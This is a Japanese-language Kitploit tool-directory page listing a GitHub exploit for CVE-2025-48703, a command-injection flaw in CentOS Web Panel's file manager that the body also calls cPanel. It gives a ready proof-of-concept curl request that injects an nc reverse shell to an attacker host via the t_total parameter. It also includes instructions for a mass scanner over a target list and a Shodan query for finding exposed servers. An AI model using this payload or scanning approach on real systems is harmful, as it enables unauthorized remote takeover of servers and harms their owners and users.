Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-48703 — CentOS Web Panelでのリモートコード実行 | Kitploit
ツール/GitHubGitHub/skynoxk/cve-2025-48703
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールペイロード開発
GitHubskynoxk/cve-2025-48703

CVE-2025-48703

CentOS Web Panelでのリモートコード実行

リポジトリを見る
3131年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🛡️ CVE-2025-48703 - cPanel ファイルマネージャーにおけるリモートコード実行(RCE)

📌 説明

CVE-2025-48703 は、ウェブホスティングコントロールパネル(例:cPanel)の filemanager モジュールにおけるリモートコード実行(RCE)の脆弱性です。これは、acc=changePerm 関数における 未サニタイズの入力処理 が原因で発生し、攻撃者が t_total パラメータを使用して任意のシステムコマンドを注入・実行することを可能にします。


🧨 影響

この脆弱性により、攻撃者は以下が可能になります:

  • ターゲットサーバー上で任意のコマンドを実行する。
  • 持続的なアクセスのためにリバースシェルを確立する。
  • 権限を昇格したり、横方向に移動したりする可能性。

⚠️ この攻撃は、最小限の認証で、または一部の構成では認証なしで実行できます。


🚀 概念実証(PoC)

✅ リバースシェルコマンド

root@kitploit:~
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
  --data 'fileName=.bashrc&currentPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'

スキャナーの使用方法

root@kitploit:~
python3 Scanner.py  #Make sure targets.txt is in the same dir

Shodan 検索

root@kitploit:~
Server: cwpsrv

参考:https://fenrisk.com/rce-centos-webpanel

ツールをダウンロード